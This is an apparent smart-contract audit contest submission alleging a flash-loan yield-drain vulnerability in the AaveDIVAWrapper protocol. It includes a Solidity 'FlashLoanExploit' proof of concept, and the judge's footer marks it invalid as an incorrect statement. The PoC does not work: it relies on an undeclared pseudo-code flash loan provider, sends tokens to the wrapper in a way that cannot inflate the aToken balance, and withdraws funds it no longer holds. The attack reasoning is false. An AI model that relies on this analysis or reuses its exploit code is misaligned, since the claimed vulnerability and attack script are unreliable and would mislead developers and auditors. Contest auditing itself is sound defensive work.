Aave DIVA Wrapper
DIVA
HardhatDeFi
15,000 USDC
View results
Previous Next
Submission Details
Severity: high
Invalid

Flash Loan to Excessive Yield Claims in AaveDIVAWrapper

cipherhawk

Summary

The AaveDIVAWrapper protocol is vulnerable to flash loan exploitation, allowing attackers to temporarily inflate the protocol’s aToken balance and claim excessive yields within a single transaction. This vulnerability arises from the yield calculation mechanism relying solely on real-time token balances without accounting for transaction-level temporal manipulations. Exploiting this issue can lead to drained reserves, protocol insolvency, and loss of user trust.

Detailed Analysis

Root Cause

The yield calculation in the _getAccruedYieldPrivate function compares the current aToken balance to the total supply of wTokens:

function _getAccruedYieldPrivate(address _collateralToken) private view returns (uint256) {
uint256 aTokenBalance = IERC20Metadata(IAave(_aaveV3Pool).getReserveData(_collateralToken).aTokenAddress)
.balanceOf(address(this));
uint256 wTokenSupply = IERC20Metadata(_collateralTokenToWToken[_collateralToken]).totalSupply();
return aTokenBalance > wTokenSupply ? aTokenBalance - wTokenSupply : 0;
}

  • Dynamic Yield Calculation: The function dynamically calculates yield based on the current aToken balance without considering changes within a single transaction.

  • Lack of Temporal Safeguards: The absence of time-based validations enables attackers to manipulate balances temporarily using flash loans, exploiting the protocol's yield mechanism.

How the Exploitation Scenario Would go:

Manipulate aToken balances using a flash loan to claim excessive yields.

  1. Borrow a Flash Loan

    • The attacker initiates a flash loan from a lending platform such as Aave, borrowing 1,000,000 units of the collateral token.

  2. Temporarily Inflate aToken Balances

    • The attacker deposits the borrowed tokens into the protocol within the same transaction. This action significantly inflates the protocol’s aToken balance.

  3. Trigger Excessive Yield Calculation

    • The attacker calls the claimYield function, exploiting the inflated aToken balance to claim an excessive amount of yield.

  4. Repay the Flash Loan

    • The attacker withdraws the tokens and repays the flash loan, leaving the protocol with drained reserves due to the excessive yield claim.

Proof of Concept (PoC)

Below is a simplified example of how an attacker could exploit the vulnerability:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/utils/Address.sol";
interface IAaveDIVAWrapper {
function claimYield(address _collateralToken) external;
}
contract FlashLoanExploit {
IAaveDIVAWrapper public wrapper;
IERC20 public collateralToken;
address public attacker;
constructor(address _wrapper, address _collateralToken) {
wrapper = IAaveDIVAWrapper(_wrapper);
collateralToken = IERC20(_collateralToken);
attacker = msg.sender;
}
function executeFlashLoan(uint256 amount) external {
require(msg.sender == attacker, "Only attacker can execute");
// Step 1: Borrow flash loan (pseudo-code)
flashLoanProvider.flashLoan(amount);
// Step 2: Deposit flash loan amount into the protocol
collateralToken.approve(address(wrapper), amount);
collateralToken.transfer(address(wrapper), amount);
// Step 3: Claim inflated yield
wrapper.claimYield(address(collateralToken));
// Step 4: Withdraw and repay flash loan
collateralToken.transfer(msg.sender, amount);
flashLoanProvider.repayLoan(amount);
}
}

Impact

  1. Financial Losses:

    • Exploiting the protocol’s yield calculation drains reserves, leading to significant financial losses.

  2. Protocol Insolvency:

    • Depleted reserves may render the protocol unable to fulfill legitimate yield claims, causing a halt in operations.

  3. Eroded User Trust:

    • Users lose confidence in the protocol’s security and reliability, reducing adoption and participation.

Recommendations

1. Introduce Yield Claim Rate Limits

2. Use Historical Balance Snapshots

Updates

Lead Judging Commences

bube Lead Judge 6 months ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.